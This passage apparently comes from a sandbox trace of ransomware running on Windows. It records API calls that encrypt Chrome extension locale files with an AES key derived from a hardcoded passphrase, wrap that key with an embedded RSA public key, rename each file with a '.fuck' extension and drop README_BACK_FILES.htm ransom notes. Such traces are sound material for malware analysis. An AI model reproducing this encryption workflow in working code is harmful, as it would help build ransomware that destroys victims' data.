(normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.136] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.138] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.140] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.140] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.140] CryptHashData (hHash=0x2938978, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.140] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.141] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.141] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.141] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ae18) returned 1 [0248.141] CryptImportPublicKeyInfo (in: hCryptProv=0x293ae18, dwCertEncodingType=0x1, pInfo=0x292f600*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f630*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f638*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29370f8) returned 1 [0248.141] CryptEncrypt (in: hKey=0x29370f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.142] CryptEncrypt (in: hKey=0x29370f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b478*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b478*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.142] WriteFile (in: hFile=0x5d58, lpBuffer=0x293b478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b478*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.143] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe6, lpOverlapped=0x0) returned 1 [0248.144] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.144] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.144] CloseHandle (hObject=0x5d5c) returned 1 [0248.144] CloseHandle (hObject=0x5d58) returned 1 [0248.148] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0248.151] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0248.152] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0248.154] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0248.155] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.155] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.155] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.155] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.155] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.155] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0248.156] AreFileApisANSI () returned 1 [0248.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.156] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.156] GetFileType (hFile=0x5d50) returned 0x1 [0248.156] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.158] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.158] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.158] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.158] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.159] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.159] GetLastError () returned 0x0 [0248.159] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json")) returned 0x20 [0248.159] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0248.159] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.160] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.160] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.161] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.164] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.164] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.164] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.164] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.164] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.164] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.164] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b1d0) returned 1 [0248.165] CryptImportPublicKeyInfo (in: hCryptProv=0x293b1d0, dwCertEncodingType=0x1, pInfo=0x292f7a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f7d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f7d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937038) returned 1 [0248.165] CryptEncrypt (in: hKey=0x2937038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.165] CryptEncrypt (in: hKey=0x2937038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b830*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b830*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.165] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293b830*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b830*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.166] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0248.167] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.167] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.167] CloseHandle (hObject=0x5d58) returned 1 [0248.167] CloseHandle (hObject=0x5d5c) returned 1 [0248.168] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0248.173] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0248.173] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.gsg")) returned 1 [0248.174] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.fuck")) returned 1 [0248.176] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.176] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.176] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.176] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.176] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.176] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0248.176] AreFileApisANSI () returned 1 [0248.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.176] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.177] GetFileType (hFile=0x5d50) returned 0x1 [0248.177] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.178] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.178] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.179] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.179] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.179] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.179] GetLastError () returned 0x0 [0248.179] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json")) returned 0x20 [0248.179] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0248.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.180] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.181] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.182] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.184] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.184] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.184] CryptHashData (hHash=0x2938978, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.184] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.184] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.184] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.184] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293aea0) returned 1 [0248.185] CryptImportPublicKeyInfo (in: hCryptProv=0x293aea0, dwCertEncodingType=0x1, pInfo=0x292f120*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f150*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f158*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937278) returned 1 [0248.185] CryptEncrypt (in: hKey=0x2937278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.185] CryptEncrypt (in: hKey=0x2937278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b500*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b500*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.185] WriteFile (in: hFile=0x5d58, lpBuffer=0x293b500*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b500*, 